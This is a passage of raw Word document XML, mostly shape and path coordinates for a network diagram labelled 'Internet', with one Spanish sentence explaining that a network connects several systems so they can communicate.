                <v:shape id="Graphic 432" o:spid="_x0000_s1029" style="position:absolute;top:99498;width:429259;height:327660;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="429259,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" path="m403818,201516r-378580,l15438,203504r-8025,5412l1991,216925,,226706r,75569l1991,312055r5422,8010l15438,325477r9800,1987l403818,327464r9800,-1987l421643,320065r5422,-8010l429056,302275r,-12595l63096,289680r-9800,-1988l45271,282280r-5422,-8009l37857,264490r1992,-9780l45271,246700r8025,-5412l63096,239301r365960,l429056,226706r-1991,-9781l421643,208916r-8025,-5412l403818,201516xem429056,239301r-365960,l72896,241288r8025,5412l86343,254710r1992,9780l86343,274271r-5422,8009l72896,287692r-9800,1988l429056,289680r,-12595l182349,277085r-5679,-5668l176670,257563r5679,-5668l429056,251895r,-12594xem245445,251895r-49215,l201909,257563r,13854l196230,277085r49215,l239767,271417r,-13854l245445,251895xem308542,251895r-49215,l265005,257563r,13854l259327,277085r49215,l302863,271417r,-13854l308542,251895xem371639,251895r-49216,l328102,257563r,13854l322423,277085r49216,l365960,271417r,-13854l371639,251895xem429056,251895r-43536,l391198,257563r,13854l385520,277085r43536,l429056,251895xem214528,r-9800,1987l196703,7399r-5422,8009l189289,25189r,9446l194337,42822r7572,3778l201909,201516r25238,l227147,46600r7572,-4408l239767,34005r,-8816l237775,15408,232353,7399,224328,1987,214528,xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15814144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57D74C1D" wp14:editId="798FD0D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1146428</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2057536</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9237345" cy="1652905"/>
                <wp:effectExtent l="0" t="0" r="0"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7345" cy="1652905"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9237345" cy="1652905"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="434" name="Graphic 434"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1091920" y="1071067"/>
                            <a:ext cx="866775" cy="527685"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="866775" h="527685">
                                <a:moveTo>
                                  <a:pt x="753389" y="37693"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="750417" y="23050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="742327" y="11074"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730351" y="2971"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715721" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696887" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696887" y="56540"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696887" y="376897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="169506" y="376897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="169506" y="56540"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696887" y="56540"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696887" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="150672" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="136055" y="2971"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124066" y="11074"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115976" y="23050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113004" y="37693"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="113004" y="433438"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753389" y="433438"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753389" y="376897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753389" y="56540"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753389" y="37693"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="866775" h="527685">
                                <a:moveTo>
                                  <a:pt x="866394" y="471131"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="489699" y="471131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="489699" y="486206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485940" y="489978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="380466" y="489978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="376694" y="486206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="376694" y="471131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="471131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="489978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2971" y="504609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11061" y="516597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23037" y="524687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37668" y="527659"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="828725" y="527659"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="843356" y="524687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="855332" y="516597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="863422" y="504609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="866394" y="489978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="866394" y="471131"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="435" name="Graphic 435"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1981580" y="190880"/>
                            <a:ext cx="2320925" cy="876935"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2320925" h="876935">
                                <a:moveTo>
                                  <a:pt x="2320925" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="876935"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="19050">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="436" name="Graphic 436"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4333588" y="1071061"/>
                            <a:ext cx="753745" cy="527685"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="753745" h="527685">
                                <a:moveTo>
                                  <a:pt x="715722" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="37669" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23043" y="2974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11065" y="11071"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2972" y="23055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="37690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="489974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2972" y="504608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11065" y="516593"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23043" y="524690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37669" y="527664"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715722" y="527664"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730349" y="524690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="742326" y="516593"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="747576" y="508819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="323958" y="508819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320191" y="505050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320191" y="493743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="323958" y="489974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="489974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="471129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56504" y="471129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56504" y="56535"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="56535"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="37690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="371045" y="37690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367278" y="33921"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367278" y="22614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="371045" y="18845"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="747576" y="18845"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="742326" y="11071"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730349" y="2974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715722" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="753745" h="527685">
                                <a:moveTo>
                                  <a:pt x="753392" y="489974"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="429433" y="489974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="433200" y="493743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="433200" y="505050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="429433" y="508819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="747576" y="508819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="750420" y="504608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="489974"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="753745" h="527685">
                                <a:moveTo>
                                  <a:pt x="753392" y="56535"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="696888" y="56535"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696888" y="471129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="471129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="56535"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="753745" h="527685">
                                <a:moveTo>
                                  <a:pt x="747576" y="18845"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="382346" y="18845"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="386113" y="22614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="386113" y="33921"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="382346" y="37690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="753392" y="37690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="750420" y="23055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="747576" y="18845"/>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4709540" y="314325"/>
                            <a:ext cx="1270" cy="562610"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path h="562610">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="562101"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="19050">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="438" name="Graphic 438"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="7322247" y="997848"/>
                            <a:ext cx="358140" cy="655320"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="358140" h="655320">
                                <a:moveTo>
                                  <a:pt x="351152" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6709" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="6699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="648358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6709" y="655058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="351152" y="655058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="648358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="565732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44732" y="565732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44732" y="89326"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="89326"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="59550"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140908" y="59550"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="134198" y="52851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="134198" y="36474"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140908" y="29775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="29775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="6699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="351152" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="358140" h="655320">
                                <a:moveTo>
                                  <a:pt x="357862" y="89326"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="313130" y="89326"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="313130" y="565732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="565732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="89326"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="358140" h="655320">
                                <a:moveTo>
                                  <a:pt x="357862" y="29775"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="216954" y="29775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223664" y="36474"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223664" y="52851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="216954" y="59550"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="59550"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357862" y="29775"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="439" name="Graphic 439"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9525"/>
                            <a:ext cx="9218295" cy="1119505"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="9218295" h="1119505">
                                <a:moveTo>
                                  <a:pt x="5065776" y="248412"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7144385" y="1117853"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="9218295" h="1119505">
                                <a:moveTo>
                                  <a:pt x="5065776" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9218041" y="954404"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="9218295" h="1119505">
                                <a:moveTo>
                                  <a:pt x="4184777" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="111925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9C033E" id="Group 433" o:spid="_x0000_s1026" style="position:absolute;margin-left:90.25pt;margin-top:162pt;width:727.35pt;height:130.15pt;z-index:15814144;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="92373,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">
                <v:shape id="Graphic 434" o:spid="_x0000_s1027" style="position:absolute;left:10919;top:10710;width:8667;height:5277;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="866775,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" path="m753389,37693l750417,23050,742327,11074,730351,2971,715721,,696887,r,56540l696887,376897r-527381,l169506,56540r527381,l696887,,150672,,136055,2971r-11989,8103l115976,23050r-2972,14643l113004,433438r640385,l753389,376897r,-320357l753389,37693xem866394,471131r-376695,l489699,486206r-3759,3772l380466,489978r-3772,-3772l376694,471131,,471131r,18847l2971,504609r8090,11988l23037,524687r14631,2972l828725,527659r14631,-2972l855332,516597r8090,-11988l866394,489978r,-18847xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 435" o:spid="_x0000_s1028" style="position:absolute;left:19815;top:1908;width:23210;height:8770;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2320925,8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" path="m2320925,l,876935e" filled="f" strokeweight="1.5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 436" o:spid="_x0000_s1029" style="position:absolute;left:43335;top:10710;width:7538;height:5277;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="753745,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" path="m715722,l37669,,23043,2974,11065,11071,2972,23055,,37690,,489974r2972,14634l11065,516593r11978,8097l37669,527664r678053,l730349,524690r11977,-8097l747576,508819r-423618,l320191,505050r,-11307l323958,489974r429434,l753392,471129r-696888,l56504,56535r696888,l753392,37690r-382347,l367278,33921r,-11307l371045,18845r376531,l742326,11071,730349,2974,715722,xem753392,489974r-323959,l433200,493743r,11307l429433,508819r318143,l750420,504608r2972,-14634xem753392,56535r-56504,l696888,471129r56504,l753392,56535xem747576,18845r-365230,l386113,22614r,11307l382346,37690r371046,l750420,23055r-2844,-4210xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 437" o:spid="_x0000_s1030" style="position:absolute;left:47095;top:3143;width:13;height:5626;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="127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" path="m,l,562101e" filled="f" strokeweight="1.5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 438" o:spid="_x0000_s1031" style="position:absolute;left:73222;top:9978;width:3581;height:6553;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="35814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" path="m351152,l6709,,,6699,,648358r6709,6700l351152,655058r6710,-6700l357862,565732r-313130,l44732,89326r313130,l357862,59550r-216954,l134198,52851r,-16377l140908,29775r216954,l357862,6699,351152,xem357862,89326r-44732,l313130,565732r44732,l357862,89326xem357862,29775r-140908,l223664,36474r,16377l216954,59550r140908,l357862,29775xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 439" o:spid="_x0000_s1032" style="position:absolute;left:95;top:95;width:92183;height:11195;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9218295,11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" path="m5065776,248412r2078609,869441em5065776,l9218041,954404em4184777,l,1119251e" filled="f" strokeweight="1.5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15814656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D4BE648" wp14:editId="03CE1CB8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5240227</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>865182</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1410970" cy="895985"/>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0970" cy="895985"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1410970" cy="895985"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="441" name="Image 441"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId204" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1410900" cy="578002"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="442" name="Graphic 442"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="615742" y="612091"/>
                            <a:ext cx="1270" cy="283845"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path h="283845">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="283590"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="19050">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="443" name="Textbox 443"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1410970" cy="895985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7368D657" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="328"/>
                                <w:ind w:left="473"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>Internet</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1D4BE648" id="Group 440" o:spid="_x0000_s1220" style="position:absolute;left:0;text-align:left;margin-left:412.6pt;margin-top:68.1pt;width:111.1pt;height:70.55pt;z-index:15814656;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordsize="14109,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">
                <v:shape id="Image 441" o:spid="_x0000_s1221" type="#_x0000_t75" style="position:absolute;width:14109;height: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">
                  <v:imagedata r:id="rId205" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 442" o:spid="_x0000_s1222" style="position:absolute;left:6157;top:6120;width:13;height:2839;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="127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" path="m,l,283590e" filled="f" strokeweight="1.5pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 443" o:spid="_x0000_s1223" type="#_x0000_t202" style="position:absolute;width:14109;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7368D657" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="328"/>
                          <w:ind w:left="473"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Internet</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Red significa la conexión de más de un sistema para que puedan comunicarse entre sí. Puede haber varios sistemas en una sola red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FF734" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FB7742" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1AF200" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
